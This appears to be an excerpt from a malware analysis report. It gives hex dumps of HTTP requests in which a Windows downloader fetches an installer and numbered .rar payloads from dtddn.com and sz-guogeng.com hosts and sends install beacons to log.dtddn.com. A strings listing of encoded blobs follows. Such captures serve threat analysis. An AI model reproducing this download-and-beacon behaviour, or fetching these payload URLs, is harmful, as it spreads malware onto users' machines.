0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   646f776e 2e647464 646e2e63 6f6d0d0a   down.dtddn.com..
0x00000080 (00128)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000090 (00144)   2d416c69 76650d0a 0d0a6c64 6972312e   -Alive....ldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f37342e 72617220 48545450   GET /74.rar HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000030 (00048)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000040 (00064)   61746962 6c653b20 57696e33 323b2057   atible; Win32; W
0x00000050 (00080)   696e4874 74702e57 696e4874 74705265   inHttp.WinHttpRe
0x00000060 (00096)   71756573 742e3529 0d0a486f 73743a20   quest.5)..Host: 
0x00000070 (00112)   646f776e 2e737a2d 67756f67 656e672e   down.sz-guogeng.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   204b6565 702d416c 6976650d 0a0d0a2e    Keep-Alive.....
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 3051322d 446f776e 4926496e   02%20Q2-DownI&In
0x00000030 (00048)   666f313d 31333636 33383831 38383034   fo1=136638818804
0x00000040 (00064)   25323031 25323030 25323031 20485454   %201%200%201 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000080 (00128)   70617469 626c653b 2057696e 33323b20   patible; Win32; 
0x00000090 (00144)   57696e48 7474702e 57696e48 74747052   WinHttp.WinHttpR
0x000000a0 (00160)   65717565 73742e35 290d0a48 6f73743a   equest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f312e72 61722048   GET /lnk/1.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f322e72 61722048   GET /lnk/2.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f332e72 61722048   GET /lnk/3.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f342e72 61722048   GET /lnk/4.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f352e72 61722048   GET /lnk/5.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f362e72 61722048   GET /lnk/6.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f372e72 61722048   GET /lnk/7.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f382e72 61722048   GET /lnk/8.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f6c6e6b 2f392e72 61722048   GET /lnk/9.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a7565 73742e35 290d0a48 6f73743a   ..uest.5)..Host:
0x000000b0 (00176)   206c6f67 2e647464 646e2e63 6f6d0d0a    log.dtddn.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303131 36363039 20485454 502f312e   20116609 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303131 39373033 20485454 502f312e   20119703 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30442532 30323531 26496e66   02%20D%20251&Inf
0x00000030 (00048)   6f313d31 33363633 38383138 38303425   o1=136638818804%
0x00000040 (00064)   32303132 32373831 20485454 502f312e   20122781 HTTP/1.
0x00000050 (00080)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 2057696e 33323b20 57696e48   ble; Win32; WinH
0x00000090 (00144)   7474702e 57696e48 74747052 65717565   ttp.WinHttpReque
0x000000a0 (00160)   73742e35 290d0a48 6f73743a 206c6f67   st.5)..Host: log
0x000000b0 (00176)   2e647464 646e2e63 6f6d0d0a 436f6e6e   .dtddn.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a 0d0a                ve........


Strings
...[

080404B0
09DSt9Mp04
0F9Z
0joAtcdLtdV/7mopXv
0nd8ayT4yyf05+W+q6ys5yfA+kTjOPObAjyAsa9eAjT7Ik3hqn9VOHywIjyhonypAHLJAjywqn6bCap
0QXuoGAA3Q8w
0v462sUjssS0H+a+1YsgHsSC+LUiOmOKCisCshsTdLsTO6BH++SotIOeu1SCALU4t2UT19FtJkVLrjGGJgrGJg+GJglGJQSO
1.00
16xeY1tqEUaQ8UgHY0
1IaEOB/PoB3C1IESWY
1OuArrClO2C1OF8QnOul
1+rbrFG4Ht8L
1X1yj4LOoXfwBpkI
2j/05dfkoh5A505O8LfAoUr
2WwOPfBxlIASPbrSRuU
3a5DK6wT4P5M+8qBS7YBgaG
3Hh5zxhrlHhWHH0r+HJ2+K0D+OR5+xh5H4hSJrhBCHh5+HhV+Hh5++
4d5P9EvuFm4
4PxuTELXSFrGdDKGmf9
4ysHZms1yys6KymzKyZ5KybgK6NRQlNRwoJRJys1TSs6JSCbKyJ+KrCpKpkRkz9R4xJHTisnNmswJSCzKyGvKybgKysRKysR2xJRKysRa2S
51DYQop9gOGBcW
5AjYLrq
5CzL7y7S9L+9+O+X1C+X78P4553ac27wsD394DSHs/dwr/zX9gPQu5snuE+k45YpZEUdulHHuMskGoIPu5Zpuw3RuIZHmMUCZok8WZ
5dV7t67MKf
5sRdMrvVCrgga3
6A+1+bJF0sg/W9ZpLbQ
6dA+KUquxeAute1midAlif1mXescxpK+xHG7KP
6ofh1/w3mPMumLfcUKwY
6pjikD5P6HsDv0VbgV
73Xm29snLeWeWpNv7kgIAE6T7qMGAENTxkmn
7a8OW1WrXOnXnfnyxanyWpmI77dDkiWNuvdXecIaxctGuce
7epE+/pI5bL1+/KTahpQWm1QWZ
7j4UFj4V6W4wWWdE6W+46WM56vKo+d4o174osW4d+W4P6W4R6W+g6Wy56FBo+VBowW4osd4d6W4P6W4R6W+o6WKo6vBo6e4o1W4ope4d6W4a6W4R6WPo6WM+6v2o6e4o144osd4G6W4PWW4h6W+o6WKo6v2o+dio1W4ope4d+W4a6W4R6WPo6Wi+6vBo+d4o1W4oBe4G6W4P6W456W+a6WKo6v2o+dio1K4ope4d+W4PpedD6WPo6Wio6FBo+d4owW4osd4d6W4P6W4R6W+o6WKo6v+o+d7owW4oBd4d+W4a6W4z6W+p6Wy+6FBo+d7o1ZBocW4G6W4PWW456W+46WKo6vBo6e4o144osd4G6W4cWW4z6WPo6Wi+6vBo+d4o1W4oBe4G6W4PWW4R6W+o6WKo6v2o6e4o174ope4d6W4a6W4e6W+46WKo6v+o+d7owW4osW4d1W4LWW456W+a6WiR617o6e4o174ope4d+W4a6W4z6W+o6Wio6vBo+d4owW4oBd4d+W4a6W4e6W+46WKo6v2o+47o1j4ope4d+W43WWdS6WPo6Wi+6FBo+d7owW4osd4d6W4P6W4R6W+o6WKo6v+o+d7owW4oBd4d+W4a6W4z6W+o6Wio6vBo+d4owW4oPd4d6W4P6W456W+46WKo6vKo6e4o1W4ope4Gcd4PWW456WcS6Wi+6FBo+diowW4osj4G6W4P6W456W+46WKo6vKo6e4o1j4ope4d1W4a6WdS6WPo6Wy+6FBo+4KowW4osd4G6W43Be456W4o6vpo+W4o61eN
8SAxePHKtL3L3nvU8SmgOG3Q8kV6TPfipd9Yt6
8TqOctGl8scxJzjnxRqVrF0T/tGarRMEGWPxIWcYxRceGt0jx7ParFhxczhar7PT4z+S/ttMI7yEGWPjxb
8ubcGWeFzG
8Uvm5H5gGmcGcYcDlUcD5EuI88eXaq5jSyh
92BDNOA
99bNcyJ7IfTWIPc
9jORVEd
A0H7vBCZs0RlQb46z0HB
A9dMkOdK99dVw9Orw9kxw9JXwVz4aDz4Yhc4c9dDT9dE99d5w9T4w9o4wb44wyT4NGcMcUdhkOdkc0d4w9k0w9d4wb0
abuqgplfyeiukiejrxmoemicvqagmpw
aC1Oguz8Ti1qdfep6C92Hu1gQuQpTiQpH1z9XX7AjkH5Ea7g9C7gEl1ijk78HuXpEu6
aceklvourchjddxteyidcbut
acmzptqkokzmsldnwicuadgqolkcdhyyhnivbpmcvcgoknkvef
adqnphtlcwauzkusvgojboejydlhwwcwi
aehngidlhrdjnkkiosvbkmwuqzmsgiighwouypadztgrqncqhgyzskjcjifqpmmkqfmdwonrxwjuiuuijilmvchalvithet
afonxwd
ahqjzxpvnei
AIQ6jvLVDNWiUA6t
ajeljwubmbpwerwahlsrmb
AjtPnj5JZotnVORJrBsC2/lQzBQfrxQU2w5nKBMF2AcC2AhE5AJProRf2AcnVAgpHqTEGot/rOQ3AtgN2AIEVosCrOgYAtQFHAcFGBgCZgP
AKbtJqerv4DWJUDSAqegvd9zAU9iA4ZQ2c+
amaub
amcpiaymzgmqfdjn
ampubsyvayycnbaa
anJKJvqF
aozdldptixm
aoztgvzwqssiqpidghggviya
Arguments
ArnJAHSYDE
atchjcleipaehnubguqxubippndkmmrvvjpupze
AtozusBVAHFbubFq9c68a3Fb
AUYHmW44sKB0
axamrgjosnfnixmcfupbfjakbynxoshmaltbxffkdtjwetadw
AxfV
axggxtvvkgmstdhgxj
Ay+x25xJLa
aZEOa+
B3BrRihQNM
b4B6
B*\AF:\bFEvKLI\svlkwwoafhnlsi.vbp
bbldplluzsuhuychedfdstte
beocisvrprrpwlyfifvofkcicpoxjtglqxcvxgufefqoauwnrtu
bG3D5j46i5pkgx75
bglgxndjcnmoghsllkqf
bgpvpnnwjzsytlbphhqmgopivftaaagkhhulvojiukdztlbqhsgmgop
bgqdyxjjxynuvzrweluhdbdtgxmeuyppszylwkwmklasyctdwsckvtgltzogmfxxfbvitxjyms
bguaucsrtdryivhlcnbhreqebqzlfhyrydwinvvpbbawqijczpizewcwtihdxafuwmuqldjopaokp
bgueyabneucoqduizs
BIoNdnr3xqfZJL
Blz/JnY
bOA3coWucokvco8XajUgcoruajAx
bofkmcwnibxrezoafdetlbfhhplvdomjzmdcuvpgqjvpmnuwlzqfhxrttbhcokjv
